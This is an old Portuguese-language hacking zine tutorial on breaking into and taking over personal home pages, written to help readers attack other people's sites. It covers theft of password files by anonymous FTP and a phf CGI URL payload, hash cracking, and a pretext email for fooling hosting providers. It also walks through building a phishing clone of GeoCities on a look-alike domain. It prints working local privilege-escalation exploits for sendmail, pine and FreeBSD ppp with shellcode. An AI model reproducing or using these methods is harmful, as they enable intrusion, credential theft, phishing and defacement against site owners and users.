<><><><><><><><><><><><><> 3>#@@#<3 HACKEANDO HOME PAGES by Dead*Pool Antes de mais nada muita gente pediu para colocar mais coisas sobre como obter passwords de pages etc... Aqui vai um mini manual isto nao nada de muita coisa tanto que muita coisa aqui s funciona em sistemas antigos. Mas para quem quer saber melhor que nada. Aqui esta sendo repetido o metodo anonymous FTP que esta na FW1 o resto lucro. 1-INTRODUCAO : O texto a seguir fala sobre como hackear uma home page. Aqui estao as suas seoes : -Precauoes-cuidados que voc deve tomar. -Sobre as senhas-arquivos falando sobre as senhas. -Desencryptando as senhas-como desencryptar senhas. -Ftp-como hackear uma HP por ftp. -Phf-como hackear uma HP usando o mtodo phf. -Home page grtis-como hackear servidores de home page grtis. -Home page grtis segundo mtodo de como hackear servidores de home pages grtis. -J cadastrado-Como hackear uma home page que voc j tenha cadastro no mesmo servidor. -Telnet e exploits-Como hackear uma page usando telnet e exploits -J cadastrado segundo mtodo de como hackear uma hp que voc j tenha cadastro no mesmo servidor. 2-PRECAUOES: Nesse texto vou ensinar diversos mtodos de como hackear uma home page. Toda vez que voc entra em um sistema seu IP fica gravado e "eles" vao poder te encontrar. Portanto antes de cometer um ato como esse eu sugiro que vocs tomem umas medidas de segurana como spoofing e etc... 3-SOBRE AS SENHAS : A senha esta em um arquivo chamado passwd. Esse arquivo esta normalmente em um diretrio chamado etc/passwd. Entao vamos falar um pouco sobre o passwd. Quando voc pega o arquivo passwd, a senha pode vir encryptada ou entao com shadow! A diferena que a senha encryptada a prpria senha s que esta encryptada e a senha com shadow faz com que a senha fique escondida em outro lugar! Ou seja, nao vai estar no passwd, vai estar em outro diretrio. Para obter a senha escrita voc vai ter que desencripta-la! As senhas com shadow sao impossveis de "desencryptar"! (levando em conta que voc nao tem unix). Uma senha encryptada mais ou menos assim : root:User:d7Bdg:1n2HG2:1127:20:Superuser TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh Agora o exemplo de uma senha com shadow : root:x:0:1:0000-Admin(0000):/:/usr/bin/csh daemon:x:1:1:0000-Admin(0000):/: bin:x:2:2:0000-Admin(0000):/usr/bin: sys:x:3:3:0000-Admin(0000):/: adm:x:4:4:0000-Admin(0000):/var/adm: lp:x:71:8:0000-lp(0000):/usr/spool/lp: smtp:x:0:0:mail daemon user:/: uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp: nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/ listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:60001:uid no body:/: noaccess:x:60002:60002:uid no access:/: webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/ ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false Voc pode notar que tem um "x" no root! Esse x pode ser representado tambm por um "*". Agora voc j sabe um pouco mais sobre o arquivo passwd e sobre as senhas. 4-DESENCRYPTANDO : Para desencryptar uma senha precisaremos de trs arquivos bsicos. Uma word list, um desencryptador (recomendo o crackerjack/jack 14) e logicamente o arquivo onde est senha(passwd). O que cada um? Word list- Como o prprio nome j diz, uma lista de palavras. Desencryptador- o programa que voc vai usar para desencryptar a senha. Passwd- Nesse arquivo est a senha encryptada. Coloque todos esses itens nesse mesmo diretrio. Abra o prompt do DOS e entre no diretrio onde eles estao. Agora faa o seguinte, digite : "nome do programa desencryptador" "nome do arquivo onde esta a senha" "nome da sua word list" Entao vamos supor que meu programa o jack, o arquivo o passwd, a word list lista. Entao ficaria assim : jack passwd lista.txt E pronto! A senha est desencryptada! Mas como isso funciona?? Quando voc roda o jack ele pega o arquivo passwd e testa com todas as palavras da word list. 5-FTP Hackear uma HP por ftp talvez seja o melhor metodo. bem simples e rpido de ser feito. Para fazer isso vamos usar o prompt do MS-DOS. Espero que voc saiba pelo menos mexer no bsico do DOS. O que vamos faz simplesmente entrar no ftp da home page com login anonymous e fazer o download do arquivo passwd. Abra o prompt do DOS. Voc vai ter que entrar no ftp da HP que voce quer hackear. Normalmente a endereo o mesmo da home page. Entao digite ftp www.hackers.com Ele vai pedir seu USER. Coloque anonymous. Agora vai pedir que voc coloque seu e-mail completo como senha. Claro que voc vai colocar alguma coisa qualquer, tipo fuckyou@idiota.com. Voc vai entrar no ftp como user anonymous e retrictions applly! Isso significa que voc entrou como anonymous e com restrioes aplicadas! Agora voc precisa ir para o diretrio etc. Entre e faa o donwload do passwd. Pra isso digite "get passwd". Pronto, o arquivo passwd vai estar no diretrio que voc estava quando entrou no ftp. Tipo windows, arquivos de programas.... Agora voc que tem o arquivo s precisa desencryptalo e pronto! A senha estar em suas maos.. 6-PHF : O phf com certeza o modo mais simples de se obter o arquivo passwd. tao simples que voc nao precisa saber nada! A nica coisa que voc tem que fazer abrir seu browser e colocar uma URL. Porm esse mtodo tem 95% de chance de nao funcionar! A maioria dos servidores j acharam o bug e concertaram. S colocar essa URL no location do seu browser : http://Endereo_da_pagina/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Apenas isso e pronto! 7-HACKEANDO SERVIDORES DE HOME PAGES GRATIS (1): Alguns servidores de home page tipo a geocities, tripod e a angelfire, dao espao para pessoas colocarem suas home pages no ar. H um modo bem simples de se obter a senha de home pages que estao nesses servidores. Tudo que voce tem que fazer mandar um e-mail pedindo pra eles te mandarem a senha da home page. Mas nao mande um e-mail estpido tipo : "por favor me mandem a senha". Faam algo mais convincente. Pegue todas as informaoes da HP possveis. Do tipo : "Ms passado eu me cadastrei no servio de vocs e recebi uma senha e um user name e meu endereo "endereo da HP do cara". Eu coloquei algumas coisas no meu espao e sa de frias. Quando voltei das ferias eu tinha me esquecido da senha!! S me lembrava do user name, que : "user name da HP". Fiquei um bom tempo de ferias e nao pude pagar o provedor, por isso estou com um e-mail diferente do que consta no cadastro de vocs. O meu antigo e-mail era esse "mail do webmaster da HP" Por favor preciso que vocs me mandem um e-mail para "seu e-mail". Porque eu nao tenho o backup dos arquivos que coloquei l e nao gostaria de perde-los. Obrigado pela atenao. Espero que voces mandem a senha o mais rpido que puderem." Companhias como a geocities sao muito ocupadas pra ficar verificando se verdade eu nao! Provavelmente eles iram acreditar e em 2 semanas(mais ou menos) voc receber a senha no seu e-mail! 8-HACKEANDO SERVIDORES DE HOME PAGES GRATIS (2): Outro modo de hackear esse tipo de home pages enganar o prprio webmaster da HP! Esse modo funciona normalmente com webmasters idiotas que nao sabem muito coisa e nem percebem que eles mesmos estao dando a senha para o hackeador. outro mtodo bem simples mas um pouco mais demorado. O que voc tem que fazer criar uma pagina onde voc finge que a geocities que esta dando mais megas para HP's! Ou seja, voc ter que criar uma pgina imitando a geocities! Faa uma pagina exatamente no estilo da da geo. E coloque tudo com as mesmas gifs, mesmos banners e coloque um formulrio pra ser preenchido e diga que quem preencher aquilo vai ganhas mais 10 megas livre de espao pra HP!!! Nesse formulrio o cara ter que colocar o user e a senha da HP, o endereo e etc.... Para o cara "receber" os megas ele ter que enviar o formulrio. Para isso ela dever clicar em algum botao de envio, normalmente um botao que fica escrito "submit" Quando a pessoa clica no botao submit formulrio enviado para a geocities pois aquele botao tem um comando para enviar para a geocities.Entao o que voc ter que fazer mudar o comando. Em vez do formulrio ser enviado para a geocities esse formulrio vai ser enviado para o seu e-mail. Para isso voc ter que editar a pagina da geocities. No lugar que tem escrito:
Voc tar que trocar para : Entao assim que o cara clicar no botao submit todos os dados serao enviados para o seu e-mail. E assim voc ter a senha. Agora s pegar um endereo na net e colocar essa pagina editada na geocities nele e mandar as pessoas visitarem. E pronto! O formulrio vai chegar com a senha e user name no teu e-mail. H uma tecnica parecida com essa mas MUITO mais complicada. Pra isso voc vai precisar de um servidor pessoal e ter que mudar algumas configuraoes em: TCP/IP Para isso abra o painel de controle e entre no cone redes. Agora entre nas propriedades de TCP/IP. Entre na conficuraao DNS. Selecione ativar DNS. Agora escreva no HOST-->WWW.GEOClTIES(repare que geocities est escrito com "l" e nao um "i") Entao escreva no dominio-->COM. Agora de OK em tudo. Vai pedir que voc reinicie o micro. Pode reiniciar. Siga o mesmo procedimento do formulario e da pagina da geocities da explicaao anterior. Salva essa pagina e coloque-a no diretrio de paginas do seu servidor. Entao voce cria um diretrio chamado "members", entra nesse diretrio e crie um, diretrio chamado "tools". Coloque tudo da page editada nesse diretrio. Coloque seu servidor pra funcionar e mande o cara entrar em : HTTP://WWW.GEOClTIES.COM/members/tools/file_manager.html O endereo tem que ser esse. Se a pessoa entrar no file manager da geocities isso nao vai funcionar(ooohhh!!!) Quando o cara colocar os dados dele l e enviar estar tudo no teu mail! Queria avisar que esses metodos tambm funcionam com a angelfire e com a tripod. A geocities foi usada como exemplo. 9-HACKEANDO UMA HP EM QUE VOCE J TENHA CADASTRO NO MESMO SERVIDOR Esse mtodo realmente difcil de funcionar mas as vezes funciona com uns admins bem idiotas.( o que nao falta por ai ;) ) Quando voc entra no seu ftp voc pode sair do seu diretrio home (diretorio onde voc esta assim que entra) e voltar alguns diretrios at encontrar o diretrio da HP que voc quer hackear. Uma vez que voce j fez, se voc puder ter acesso aos arquivos HTML pegue-os e edite eles! E pronto! Com admins mais inteligentes voc nao consegue ter acesso os arquivos da page alvo. 10-TELNET E EXPLOITS : Exploits talvez o melhor mtodo de hackear uma home page. Mas ele um pouco mais complicado do que os outros mtodos como phf e ftp. Antes de tudo voc vai precisar de um programa de telnet. Exploits expoem erros e bugs nos sistemas e normalmente te dao root, sysop, admin.... Vou listar alguns exploits abaixo :(olhe a FW 02 onde existem estes e muitos outros exploits ou veja a seao exploits desta FW) ;-) Esse se chama sendmail bug. Ele cria um programa /tmp/x que chama shells como root. -----------------------------Corta cat << _EOF_ >/tmp/x.c #define RUN "/bin/ksh" #include main() { execl(RUN,RUN,NULL); } _EOF_ # cat << _EOF_ >/tmp/spawnfish.c main() { execl("/usr/lib/sendmail","/tmp/smtpd",0); } _EOF_ # cat << _EOF_ >/tmp/smtpd.c main() { setuid(0); setgid(0); system("chown root /tmp/x ;chmod 4755 /tmp/x"); } _EOF_ # # gcc -O -o /tmp/x /tmp/x.c gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c gcc -O3 -o /tmp/smtpd /tmp/smtpd.c # /tmp/spawnfish kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1` rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c sleep 5 if [ -u /tmp/x ] ; then echo "leet..." /tmp/x -------------------------------------Corta Agora mais um exploit. Eu vou mostrar o "pine exploit" vendo o processo da tabela com ps voc pode ver os usurio rodando o pine. Um entao pode fazer um ls no /tmp/ pra conseguir o nome do lockfile pra cada usurio. Vendo o processo da tabela de novo vai revelar quais usuarios ou saem com mensagens nao lidas nos seus inbox. Efetivamente deletando o lockfile respectivo. Criando um link de /tmp/.hamors_lockfile para ~hamors/.rhosts vai fazer com que o pine crie ~hamors/.rhosts como com um arquivo 666 com as identidades processadas e que elas contm. Agora precisa fazer um " echo "+ +" > /tmp/.hamors_lockfile e rm /tmp/.hamors_lockfile. ---------------------------------------Corta hamors (21 19:04) litterbox:~> pine catluvr (6 19:06) litterbox:~> ps -aux | grep pine catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors - -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4 catluvr (8 19:07) litterbox:~> ps -aux | grep pine catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4 hamors (23 19:09) litterbox:~> pine catluvr (11 19:10) litterbox:~> ps -aux | grep pine catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4 catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4 + + catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4 catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors ----------------------------------Corta Esse o ltimo que vou relacionar aqui. Exploitation script para vunerabilidade ppp. Funciona em "FreeBSD". -------------------------Corta #include #include #include #define BUFFER_SIZE 156 /* size of the bufer to overflow */ #define OFFSET -290 /* number of bytes to jump after the start of the buffer */ long get_esp(void) { __asm__("movl %esp,%eax\n"); } main(int argc, char *argv[]) { char *buf = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; char execshell[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */ "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */ "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */ "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */ int i,j; buf = malloc(4096); /* fill start of bufer with nops */ i = BUFFER_SIZE-strlen(execshell); memset(buf, 0x90, i); ptr = buf + i; /* place exploit code into the buffer */ for(i = 0; i < strlen(execshell); i++) *ptr++ = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (104/4); i++) *addr_ptr++ = get_esp() + OFFSET; ptr = (char *)addr_ptr; *ptr = 0; setenv("HOME", buf, 1); execl("/usr/sbin/ppp", "ppp", NULL); } ----------------------------------Corta Agora voc tem o root. Faa o que voc quiser! Mas eu trocaria logo a senha da HP antes de mexer em qualquer coisa ou deletar. <><><><><><><><><><><><><>